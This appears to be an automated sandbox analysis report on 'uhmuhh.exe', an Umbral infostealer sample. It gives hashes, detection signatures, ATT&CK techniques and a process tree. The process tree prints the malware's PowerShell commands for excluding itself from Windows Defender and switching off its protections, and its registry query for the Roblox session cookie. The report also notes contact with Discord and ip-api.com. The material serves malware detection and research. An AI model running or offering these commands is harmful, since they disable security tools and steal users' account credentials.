Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
08-08-2024 16:41
Behavioral task
behavioral1
Sample
uhmuhh.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
uhmuhh.exe
Resource
win10v2004-20240802-en
General
-
Target
uhmuhh.exe
-
Size
229KB
-
MD5
0d407796194f47dd4739950f347631dc
-
SHA1
2e843294cd4ccbdcb53b0ca4cdcb0d6640d75615
-
SHA256
1ab54a5786eeedb01e74215a50a796fefbd12c47c0b864b1be5f6d45a2951bf4
-
SHA512
b70550be02cc4b622fa35c0189884104a2b6719e8b593e156b74874cffc835a906df3b746b2247c2bffffbb47be6470ba3ac16cb2c8e163785f64650c43a4b97
-
SSDEEP
6144:tloZMNrIkd8g+EtXHkv/iD41KaC9rI8j867NokRQg4db8e1mAG+Iwi:voZmL+EP81KaC9rI8j867NokRQgkC+Ip
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2044-1-0x0000000000E30000-0x0000000000E70000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1168 powershell.exe 2892 powershell.exe 2844 powershell.exe 1980 powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1528 wmic.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1168 powershell.exe 2892 powershell.exe 2844 powershell.exe 2608 powershell.exe 1980 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2044 uhmuhh.exe Token: SeDebugPrivilege 1168 powershell.exe Token: SeDebugPrivilege 2892 powershell.exe Token: SeDebugPrivilege 2844 powershell.exe Token: SeDebugPrivilege 2608 powershell.exe Token: SeIncreaseQuotaPrivilege 1520 wmic.exe Token: SeSecurityPrivilege 1520 wmic.exe Token: SeTakeOwnershipPrivilege 1520 wmic.exe Token: SeLoadDriverPrivilege 1520 wmic.exe Token: SeSystemProfilePrivilege 1520 wmic.exe Token: SeSystemtimePrivilege 1520 wmic.exe Token: SeProfSingleProcessPrivilege 1520 wmic.exe Token: SeIncBasePriorityPrivilege 1520 wmic.exe Token: SeCreatePagefilePrivilege 1520 wmic.exe Token: SeBackupPrivilege 1520 wmic.exe Token: SeRestorePrivilege 1520 wmic.exe Token: SeShutdownPrivilege 1520 wmic.exe Token: SeDebugPrivilege 1520 wmic.exe Token: SeSystemEnvironmentPrivilege 1520 wmic.exe Token: SeRemoteShutdownPrivilege 1520 wmic.exe Token: SeUndockPrivilege 1520 wmic.exe Token: SeManageVolumePrivilege 1520 wmic.exe Token: 33 1520 wmic.exe Token: 34 1520 wmic.exe Token: 35 1520 wmic.exe Token: SeIncreaseQuotaPrivilege 1520 wmic.exe Token: SeSecurityPrivilege 1520 wmic.exe Token: SeTakeOwnershipPrivilege 1520 wmic.exe Token: SeLoadDriverPrivilege 1520 wmic.exe Token: SeSystemProfilePrivilege 1520 wmic.exe Token: SeSystemtimePrivilege 1520 wmic.exe Token: SeProfSingleProcessPrivilege 1520 wmic.exe Token: SeIncBasePriorityPrivilege 1520 wmic.exe Token: SeCreatePagefilePrivilege 1520 wmic.exe Token: SeBackupPrivilege 1520 wmic.exe Token: SeRestorePrivilege 1520 wmic.exe Token: SeShutdownPrivilege 1520 wmic.exe Token: SeDebugPrivilege 1520 wmic.exe Token: SeSystemEnvironmentPrivilege 1520 wmic.exe Token: SeRemoteShutdownPrivilege 1520 wmic.exe Token: SeUndockPrivilege 1520 wmic.exe Token: SeManageVolumePrivilege 1520 wmic.exe Token: 33 1520 wmic.exe Token: 34 1520 wmic.exe Token: 35 1520 wmic.exe Token: SeIncreaseQuotaPrivilege 588 wmic.exe Token: SeSecurityPrivilege 588 wmic.exe Token: SeTakeOwnershipPrivilege 588 wmic.exe Token: SeLoadDriverPrivilege 588 wmic.exe Token: SeSystemProfilePrivilege 588 wmic.exe Token: SeSystemtimePrivilege 588 wmic.exe Token: SeProfSingleProcessPrivilege 588 wmic.exe Token: SeIncBasePriorityPrivilege 588 wmic.exe Token: SeCreatePagefilePrivilege 588 wmic.exe Token: SeBackupPrivilege 588 wmic.exe Token: SeRestorePrivilege 588 wmic.exe Token: SeShutdownPrivilege 588 wmic.exe Token: SeDebugPrivilege 588 wmic.exe Token: SeSystemEnvironmentPrivilege 588 wmic.exe Token: SeRemoteShutdownPrivilege 588 wmic.exe Token: SeUndockPrivilege 588 wmic.exe Token: SeManageVolumePrivilege 588 wmic.exe Token: 33 588 wmic.exe Token: 34 588 wmic.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2044 wrote to memory of 1168 2044 uhmuhh.exe 30 PID 2044 wrote to memory of 1168 2044 uhmuhh.exe 30 PID 2044 wrote to memory of 1168 2044 uhmuhh.exe 30 PID 2044 wrote to memory of 2892 2044 uhmuhh.exe 32 PID 2044 wrote to memory of 2892 2044 uhmuhh.exe 32 PID 2044 wrote to memory of 2892 2044 uhmuhh.exe 32 PID 2044 wrote to memory of 2844 2044 uhmuhh.exe 34 PID 2044 wrote to memory of 2844 2044 uhmuhh.exe 34 PID 2044 wrote to memory of 2844 2044 uhmuhh.exe 34 PID 2044 wrote to memory of 2608 2044 uhmuhh.exe 36 PID 2044 wrote to memory of 2608 2044 uhmuhh.exe 36 PID 2044 wrote to memory of 2608 2044 uhmuhh.exe 36 PID 2044 wrote to memory of 1520 2044 uhmuhh.exe 38 PID 2044 wrote to memory of 1520 2044 uhmuhh.exe 38 PID 2044 wrote to memory of 1520 2044 uhmuhh.exe 38 PID 2044 wrote to memory of 588 2044 uhmuhh.exe 41 PID 2044 wrote to memory of 588 2044 uhmuhh.exe 41 PID 2044 wrote to memory of 588 2044 uhmuhh.exe 41 PID 2044 wrote to memory of 2836 2044 uhmuhh.exe 43 PID 2044 wrote to memory of 2836 2044 uhmuhh.exe 43 PID 2044 wrote to memory of 2836 2044 uhmuhh.exe 43 PID 2044 wrote to memory of 1980 2044 uhmuhh.exe 45 PID 2044 wrote to memory of 1980 2044 uhmuhh.exe 45 PID 2044 wrote to memory of 1980 2044 uhmuhh.exe 45 PID 2044 wrote to memory of 1528 2044 uhmuhh.exe 47 PID 2044 wrote to memory of 1528 2044 uhmuhh.exe 47 PID 2044 wrote to memory of 1528 2044 uhmuhh.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\uhmuhh.exe"C:\Users\Admin\AppData\Local\Temp\uhmuhh.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\uhmuhh.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:588
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:2836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1980
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:1528
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD59e12f8b76b10084dab51c7760502f982
SHA1aaa65a3f6953eef8903223a60ab30e3f1ade0e88
SHA256fdcbc18b607ce7e25b558326f9a48716fb7cc751ec9e4b1bdb696aeccaf4030e
SHA512a66c6053681d0c4e733dff32b008526580e1e49379c8b390901319227c84205d149fde8eb53047fc9c89f76de09ac52bddac0f0c639b1afc057de848418dc3ca